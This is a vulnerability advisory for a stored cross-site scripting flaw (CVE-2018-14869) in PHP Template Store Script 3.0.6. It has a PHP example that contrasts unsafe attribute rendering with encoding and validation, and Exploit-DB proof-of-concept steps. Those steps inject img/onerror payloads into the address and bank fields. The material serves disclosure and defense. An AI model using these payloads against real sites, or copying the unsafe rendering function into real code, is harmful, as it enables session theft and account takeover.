Vendor: PHP Template Store Script
By: Sarafraz Khan
CVSS: 5.4 (MEDIUM)
Vulnerability: Stored XSS
CWE: 79
Product Name: PHP Template Store Script
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: YES
Related CVE: CVE-2018-14869
CPE: a:phpscriptsmall:php_template_store_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

PHP Template Store Script 3.0.6 – Stored XSS via Address, Bank Name, and A/c Holder Name

A stored cross-site scripting vulnerability exists in PHP Template Store Script 3.0.6. An attacker can inject malicious JavaScript code into the Address Line 1, Address Line 2, Bank Name, and A/C Holder Name fields of the Personal Information page, which will be executed when the victim views the page. This can be used to steal the victim's session cookie and take over their account.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database.
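
The mitigation above, as an added PHP example (not the product's code or the vendor's patch): it shows the unsafe attribute rendering that lets the stored value break out of `value="..."`, next to allow-list validation on write and HTML encoding on output. Output encoding is included because validation alone does not neutralise values already in the database; the field names, length cap and allowed character set are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed sample: a stored profile row. The first value is the PoC string
// from this advisory; the field names are assumptions, not the product's columns.
$profile = [
    'address1'  => '"><img src=x onerror=prompt(/SARAFRAZ/)>',
    'bank_name' => 'First National Bank',
];

// Vulnerable pattern: the stored value is concatenated into the attribute as-is,
// so a leading "> closes value="..." and the following tag becomes live markup.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode at output time for the HTML attribute context.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . e($name) . '" value="' . e($value) . '">';
}

// Input validation on write: allow-list of characters plus a byte-length cap.
// The allowed set is an assumption; tune it to the real address and name data.
function validate_profile_text(string $value, int $maxLen = 100): bool
{
    return strlen($value) <= $maxLen
        && preg_match('/^[\p{L}\p{N} .,\'#\/-]*$/u', $value) === 1;
}

foreach ($profile as $name => $value) {
    echo 'accepted on write: ' . (validate_profile_text($value) ? 'yes' : 'no') . "\n";
    echo 'unsafe: ' . render_field_unsafe($name, $value) . "\n";
    echo 'safe:   ' . render_field_safe($name, $value) . "\n\n";
}
```

Run it with `php` on the command line and compare the `unsafe` and `safe` lines for the first field: only the encoded form keeps the whole string inside the attribute value.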

Exploit-DB raw data:

*******************************************************************************************
# Exploit Title: PHP Template Store Script 3.0.6 - Stored XSS via Address, Bank Name, and A/c Holder Name
# Date: 02.08.2018
# Site Title: Exclusive Scripts
# Vendor Homepage:  https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web:  https://goglequeens.com
# Tested on: Windows 10 - Firefox
# CVE-2018-14869
*****************************************************************************************
 
Proof of Concept:
--------------------------
1. Go to the site ( http://www.server.com/ ).
2. Click on Login => Register, then fill in the form and click on Register Now.
3. Go to your mail and verify it.
4. Come back to the site and sign in using your verified mail and password.
5. Go to Setting => Personal information and paste this code in:
    Address line 1  => "><img src=x onerror=prompt(/SARAFRAZ/)>
    Address Line 2  => "><img src=x onerror=prompt(/KHAN/)>
    Bank name       => "><img src=x onerror=prompt(/KING/)>
    A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>

   and then click on Update Profile.

6. You will now get popups of /SARAFRAZ/, /KHAN/, /KING/ and /GOOGLEQUEENS/ in your account.

***************************************************************************************